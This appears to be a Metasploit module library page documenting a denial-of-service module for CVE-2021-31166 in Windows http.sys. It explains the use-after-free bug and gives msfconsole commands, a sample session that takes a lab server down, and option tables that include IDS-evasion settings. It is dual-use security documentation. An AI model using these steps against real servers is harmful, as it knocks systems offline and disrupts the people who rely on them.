Windows IIS HTTP Protocol Stack DOS - Metasploit
This page contains detailed information about how to use the auxiliary/dos/windows/http/http_sys_accept_encoding_dos_cve_2021_31166 metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.
Module Overview
Name: Windows IIS HTTP Protocol Stack DOS
Module: auxiliary/dos/windows/http/http_sys_accept_encoding_dos_cve_2021_31166
Source code: modules/auxiliary/dos/windows/http/http_sys_accept_encoding_dos_cve_2021_31166.rb
Disclosure date: 2021-05-11
Last modification time: 2022-03-16 14:03:20 +0000
Supported architecture(s): -
Supported platform(s): Windows
Target service / protocol: http, https
Target network port(s): 80, 443, 3000, 8000, 8008, 8080, 8443, 8880, 8888
List of CVEs: CVE-2021-31166
This module exploits CVE-2021-31166, a UAF bug in http.sys when parsing specially crafted Accept-Encoding headers that was patched by Microsoft in May 2021, on vulnerable IIS servers. Successful exploitation will result in the target computer BSOD'ing before subsequently rebooting. Note that the target IIS server may or may not come back up, this depends on the target's settings as to whether IIS is configured to start on reboot.
Module Ranking and Traits
Module Ranking:
- normal: The exploit is otherwise reliable, but depends on a specific version and can't (or doesn't) reliably autodetect. More information about ranking can be found here.
Reliability:
- ioc-in-logs: Module leaves signs of a compromise in a log file (Example: SQL injection data found in HTTP log).
Stability:
- crash-os-restarts: Module may crash the OS, but the OS restarts.
Side Effects:
- screen-effects: Module may show something on the screen (Example: a window pops up).
Basic Usage
msf > use auxiliary/dos/windows/http/http_sys_accept_encoding_dos_cve_2021_31166
msf auxiliary(http_sys_accept_encoding_dos_cve_2021_31166) > show targets
... a list of targets ...
msf auxiliary(http_sys_accept_encoding_dos_cve_2021_31166) > set TARGET target-id
msf auxiliary(http_sys_accept_encoding_dos_cve_2021_31166) > show options
... show and set options ...
msf auxiliary(http_sys_accept_encoding_dos_cve_2021_31166) > exploit
Required Options
- RHOSTS: The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
Knowledge Base
Vulnerable Application
Windows 10 and Windows Server version 20H2 and 2004 servers who do not have KB5003173 installed to address CVE-2021-31166 are affected.
The vulnerability occurs due to a use-after-free (UAF) bug in http.sys
's UlpParseContentCoding
function whereby a local LIST_ENTRY
item has items appended to it but the LIST_ENTRY
structure
is not NULL
'd out after it finished being used. An attacker can abuse this to trigger a code path
that free's every entry of the local LIST_ENTRY
structure, which will be linked to in the Request
object this function uses to handle the incoming request. The Request
object will then be used later
on in the code resulting in a UAF vulnerability.
Note that whilst this exploit tries to target IIS servers, in theory any
component that uses http.sys
could be vulnerable, including client programs
which use http.sys
to connect to servers.
The module itself will use this vulnerability to cause a invalid memory access exception error in http.sys
by sending a request with a specially crafted Accept-Encoding
header to the target IIS server. Since
http.sys
is a kernel module, this will result in a BSOD on the target system. This will cause IIS to go down
for a period of time until the server reboots and IIS restarts again.
Verification Steps
- Start
msfconsole
use exploit/windows/iis/http_sys_accept_encoding_dos_cve_2021_31166
set RHOST <ip>
exploit
- Verify that the target server is down.
Options
RHOST
- Required
- Type: address
- No default value
IP address or hostname of the target IIS server.
RPORT
- Required
- Type: integer
- Default value: 80
The port on the target server where IIS is running.
TARGETURI
- Optional
- Type: string
- Default value: /
The base URL of the IIS install on the target server.
Scenarios
Windows 10 20H2 Build 19042.685 With IIS Installed
~/git/metasploit-framework │ iis_dos_cve2022_21907 ?18 ./msfconsole
IIIIII dTb.dTb _.---._
II 4' v 'B .'"".'/|\`.""'.
II 6. .P : .' / | \ `. :
II 'T;. .;P' '.' / | \ `.'
II 'T; ;P' `. / | \ .'
IIIIII 'YvP' `-.__|__.-'
I love shells --egypt
=[ metasploit v6.1.34-dev-88b17b79fe ]
+ -- --=[ 2209 exploits - 1171 auxiliary - 395 post ]
+ -- --=[ 600 payloads - 45 encoders - 11 nops ]
+ -- --=[ 9 evasion ]
Metasploit tip: You can use help to view all
available commands
[*] Starting persistent handler(s)...
msf6 payload(windows/x64/meterpreter/reverse_tcp) > use auxiliary/dos/windows/http/http_sys_accept_encoding_dos_cve_2021_31166
msf6 auxiliary(dos/windows/http/http_sys_accept_encoding_dos_cve_2021_31166) > show options
Module options (auxiliary/dos/windows/http/http_sys_accept_encoding_dos_cve_2021_31166):
Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no A proxy chain of format type:host:port[,type:hos
t:port][...]
RHOSTS yes The target host(s), see https://github.com/rapid
7/metasploit-framework/wiki/Using-Metasploit
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI / yes The URI of the IIS Server.
VHOST no HTTP server virtual host
msf6 auxiliary(dos/windows/http/http_sys_accept_encoding_dos_cve_2021_31166) > set RHOSTS 172.22.216.145
RHOSTS => 172.22.216.145
msf6 auxiliary(dos/windows/http/http_sys_accept_encoding_dos_cve_2021_31166) > exploit
[*] Running module against 172.22.216.145
[*] Connecting to target to make sure its alive...
[+] Successfully connected to target. Sending payload...
[+] Payload was sent to the target server.
[*] Checking that the server is down...
[+] Target is down.
[*] Auxiliary module execution completed
msf6 auxiliary(dos/windows/http/http_sys_accept_encoding_dos_cve_2021_31166) >
Go back to menu.
Msfconsole Usage
Here is how the dos/windows/http/http_sys_accept_encoding_dos_cve_2021_31166 auxiliary module looks in the msfconsole:
msf6 > use auxiliary/dos/windows/http/http_sys_accept_encoding_dos_cve_2021_31166
msf6 auxiliary(dos/windows/http/http_sys_accept_encoding_dos_cve_2021_31166) > show info
Name: Windows IIS HTTP Protocol Stack DOS
Module: auxiliary/dos/windows/http/http_sys_accept_encoding_dos_cve_2021_31166
License: Metasploit Framework License (BSD)
Rank: Normal
Disclosed: 2021-05-11
Provided by:
Max
Stefan Blair
Axel Souchet
Maurice LAMBERT <[email protected]>
Module side effects:
screen-effects
Module stability:
crash-os-restarts
Module reliability:
ioc-in-logs
Check supported:
No
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI / yes The URI of the IIS Server.
VHOST no HTTP server virtual host
Description:
This module exploits CVE-2021-31166, a UAF bug in http.sys when
parsing specially crafted Accept-Encoding headers that was patched
by Microsoft in May 2021, on vulnerable IIS servers. Successful
exploitation will result in the target computer BSOD'ing before
subsequently rebooting. Note that the target IIS server may or may
not come back up, this depends on the target's settings as to
whether IIS is configured to start on reboot.
References:
https://nvd.nist.gov/vuln/detail/CVE-2021-31166
https://nvd.nist.gov/vuln/detail/CVE-2021-31166
https://github.com/mauricelambert/CVE-2021-31166
https://twitter.com/metr0/status/1392631376592076805
https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-31166
Module Options
This is a complete list of options available in the dos/windows/http/http_sys_accept_encoding_dos_cve_2021_31166 auxiliary module:
msf6 auxiliary(dos/windows/http/http_sys_accept_encoding_dos_cve_2021_31166) > show options
Module options (auxiliary/dos/windows/http/http_sys_accept_encoding_dos_cve_2021_31166):
Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI / yes The URI of the IIS Server.
VHOST no HTTP server virtual host
Advanced Options
Here is a complete list of advanced options supported by the dos/windows/http/http_sys_accept_encoding_dos_cve_2021_31166 auxiliary module:
msf6 auxiliary(dos/windows/http/http_sys_accept_encoding_dos_cve_2021_31166) > show advanced
Module advanced options (auxiliary/dos/windows/http/http_sys_accept_encoding_dos_cve_2021_31166):
Name Current Setting Required Description
---- --------------- -------- -----------
DOMAIN WORKSTATION yes The domain to use for Windows authentication
DigestAuthIIS true no Conform to IIS, should work for most servers. Only set to false for non-IIS servers
FingerprintCheck true no Conduct a pre-exploit fingerprint verification
HttpClientTimeout no HTTP connection and receive timeout
HttpPassword no The HTTP password to specify for authentication
HttpRawHeaders no Path to ERB-templatized raw headers to append to existing headers
HttpTrace false no Show the raw HTTP requests and responses
HttpTraceColors red/blu no HTTP request and response colors for HttpTrace (unset to disable)
HttpTraceHeadersOnly false no Show HTTP headers only in HttpTrace
HttpUsername no The HTTP username to specify for authentication
SSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL
23, SSL3, TLS1, TLS1.1, TLS1.2)
UserAgent Mozilla/5.0 (Macintosh; Intel Mac OS X 12_2_1) AppleWebKit no The User-Agent header to use for all requests
/537.36 (KHTML, like Gecko) Chrome/98.0.4758.81 Safari/537
.36
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
Auxiliary Actions
This is a list of all auxiliary actions that the dos/windows/http/http_sys_accept_encoding_dos_cve_2021_31166 module can do:
msf6 auxiliary(dos/windows/http/http_sys_accept_encoding_dos_cve_2021_31166) > show actions
Auxiliary actions:
Name Description
---- -----------
Evasion Options
Here is the full list of possible evasion options supported by the dos/windows/http/http_sys_accept_encoding_dos_cve_2021_31166 auxiliary module in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):
msf6 auxiliary(dos/windows/http/http_sys_accept_encoding_dos_cve_2021_31166) > show evasion
Module evasion options:
Name Current Setting Required Description
---- --------------- -------- -----------
HTTP::header_folding false no Enable folding of HTTP headers
HTTP::method_random_case false no Use random casing for the HTTP method
HTTP::method_random_invalid false no Use a random invalid, HTTP method for request
HTTP::method_random_valid false no Use a random, but valid, HTTP method for request
HTTP::pad_fake_headers false no Insert random, fake headers into the HTTP request
HTTP::pad_fake_headers_count 0 no How many fake headers to insert into the HTTP request
HTTP::pad_get_params false no Insert random, fake query string variables into the request
HTTP::pad_get_params_count 16 no How many fake query string variables to insert into the request
HTTP::pad_method_uri_count 1 no How many whitespace characters to use between the method and uri
HTTP::pad_method_uri_type space no What type of whitespace to use between the method and uri (Accepted: space, tab, apache)
HTTP::pad_post_params false no Insert random, fake post variables into the request
HTTP::pad_post_params_count 16 no How many fake post variables to insert into the request
HTTP::pad_uri_version_count 1 no How many whitespace characters to use between the uri and version
HTTP::pad_uri_version_type space no What type of whitespace to use between the uri and version (Accepted: space, tab, apache)
HTTP::uri_dir_fake_relative false no Insert fake relative directories into the uri
HTTP::uri_dir_self_reference false no Insert self-referential directories into the uri
HTTP::uri_encode_mode hex-normal no Enable URI encoding (Accepted: none, hex-normal, hex-noslashes, hex-random, hex-all, u-normal, u-all, u-random)
HTTP::uri_fake_end false no Add a fake end of URI (eg: /%20HTTP/1.0/../../)
HTTP::uri_fake_params_start false no Add a fake start of params to the URI (eg: /%3fa=b/../)
HTTP::uri_full_url false no Use the full URL for all HTTP requests
HTTP::uri_use_backslashes false no Use back slashes instead of forward slashes in the uri
HTTP::version_random_invalid false no Use a random invalid, HTTP version for request
HTTP::version_random_valid false no Use a random, but valid, HTTP version for request
Go back to menu.
Error Messages
This module may fail with the following error messages:
Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.
<PEER> - Could not connect to the target IIS server - no response
Here is a relevant code snippet related to the "<PEER> - Could not connect to the target IIS server - no response" error message:
63: 'uri' => normalize_uri(target_uri.path, ''),
64: 'method' => 'GET'
65: )
66:
67: if res.nil?
68: fail_with(Failure::Unreachable, "#{peer} - Could not connect to the target IIS server - no response")
69: end
70:
71: print_good('Successfully connected to target. Sending payload...')
72:
73: payload =
Target appears to still be alive. It may have not received the packet due to network filtering, or it may not be vulnerable.
Here is a relevant code snippet related to the "Target appears to still be alive. It may have not received the packet due to network filtering, or it may not be vulnerable." error message:
98: )
99:
100: if res.nil?
101: print_good('Target is down.')
102: else
103: print_error('Target appears to still be alive. It may have not received the packet due to network filtering, or it may not be vulnerable.')
104: end
105: rescue Rex::ConnectionError, Errno::ECONNRESET
106: print_good('Target is down.')
107: end
108: end
Go back to menu.
Related Pull Requests
References
- CVE-2021-31166
- https://nvd.nist.gov/vuln/detail/CVE-2021-31166
- https://github.com/mauricelambert/CVE-2021-31166
- https://twitter.com/metr0/status/1392631376592076805
- https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-31166
See Also
Check also the following modules related to this module:
- auxiliary/dos/windows/http/ms10_065_ii6_asp_dos
- auxiliary/dos/windows/http/pi3web_isapi
- auxiliary/fuzzers/http/http_form_field
- auxiliary/fuzzers/http/http_get_uri_long
- auxiliary/fuzzers/http/http_get_uri_strings
- auxiliary/gather/http_pdf_authors
- auxiliary/scanner/http/http_header
- auxiliary/scanner/http/http_hsts
- auxiliary/scanner/http/http_login
- auxiliary/scanner/http/http_put
- auxiliary/scanner/http/http_sickrage_password_leak
- auxiliary/scanner/http/http_traversal
- auxiliary/scanner/http/http_version
- auxiliary/server/capture/http_basic
- auxiliary/server/capture/http_javascript_keylogger
- auxiliary/server/capture/http_ntlm
- auxiliary/server/http_ntlmrelay
Authors
- Max
- Stefan Blair
- Axel Souchet
- Maurice LAMBERT <mauricelambert434[at]gmail.com>
Version
This page has been produced using Metasploit Framework version 6.1.36-dev. For more modules, visit the Metasploit Module Library.
Go back to menu.